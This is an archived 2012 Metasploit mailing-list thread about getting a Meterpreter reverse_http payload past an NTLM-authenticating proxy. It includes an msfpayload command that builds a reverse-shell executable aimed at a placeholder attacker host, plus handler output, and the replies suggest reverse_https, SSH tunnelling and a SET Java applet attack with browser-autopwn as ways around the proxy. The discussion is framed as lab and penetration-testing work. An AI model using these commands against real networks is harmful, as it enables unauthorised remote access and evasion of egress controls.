Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Re: meterpreter ntlm proxy bypass

From: "Adrián Puente Z. " <apuente () hackarandas com>
Date: Thu, 12 Apr 2012 15:18:27 -0500
I have some old papers in how to bypass proxys using SSL to emulate a valid https in my blog www.hackarandas.com so far 
the payload that had worked for me in this scenario was reverse_https with the listener in the 443 port. Other thing 
that worked for me was using the SET with the Java applet attack to download a simple bat compressed with iexpress that 
will do a "start iexplore http://x.y.z.a:80/browser-autopwn"; 

Regards,

---
Adrián Puente Z.
www.hackarandas.com

"... ruego a mi orgullo que se acompañe siempre de mi prudencia,
y si algún día mi prudencia se echara a volar, que al menos
pueda volar junto con mi locura"
    --Nietzche

Huella: F974 46CE 67CD A4EE 7A33  7DDF D249 95CF CABA D400
http://allman.rhon.itam.mx/~apuente/llaves/AdrianPuente-gmail.asc.gz

On Apr 11, 2012, at 15:36, Sherif El-Deeb <archeldeeb () gmail com> wrote:


If the logged in user already is a member of the domain, is allowed
internet access and the machine is joined to the domain, then
reverse_http SHOULD go through the system configured proxy even with
NTLM auth, no problem (thanks HD & Mubix!) ... (if you meet that
criteria already try setting the LPORT at the mutli/handler to 80
since that might be the only port allowed).

however, if the logged in user is not allowed internet connection, or
the machine is not member of the domain (i.e. everythime you connect
to the internet it pops-up asking for creds) you have to have the
following:

1- You have to know the username,  password and  domain of an
allowed-internet user.
2- the Proxy IP and port
3- you have to bundle "meterpreter" with a "NTLM-Auth-proxy-aware"
program to tunnel through the connection for you, a
tested-and-guaranteed example would be (SSH server listening on 443) +
(PLINK with the -L switch) + (meterpreter with LHOST set to 127.0.0.1)
+ (some command-line kung-fu to add the host SSH key and glue
everything together) + iExpress.

As far as I know, there's nothing built-in that allows you to specify
a username, pass, domain and the proxy:port to meterpreter :)

I think I'll write a blog post about this someday :) but please beware
that you have to know lots of things in advance to make this work.

Sherif Eldeeb

On Wed, Apr 11, 2012 at 10:49 PM, audio audience <audience099 () gmail com> wrote:

Hello Everyone,

I want to bypass ntlm supported proxy bypass with meterpreter.
I tested it in my Labs; all outgoing traffics blocked by firewall for
client. If client want to access internet, it's need to set windows username
and password to ntlm auth. proxy.

I created meterpreter payload this following options;
# msfpayload windows/meterpreter/reverse_http LHOST=x.y.z.t LPORT=8080
AutoRunScript='migrate2 iexplore.exe' X > /var/www/8.exe

For listening mode;
msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_http):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread,
process, none
   LHOST     x.y.z.t    yes       The local listener hostname
   LPORT     8080             yes       The local listener port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > exploit

[*] Started HTTP reverse handler on http://x.y.z.t:8080/
[*] Starting the payload handler...


And then i ran 8.exe to victim computer but proxy is blocked meterpreter
http connection, because meterpreter didn't complate ntlm auth.
Squid Log;
1334171617.857      0 a.b.c.d TCP_DENIED/407 1744 GET
http://x.y.z.t:8080/l2eY - NONE/- text/html

How i can bypass ntlm auth. with meterpreter payload.

Thanks for supports

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: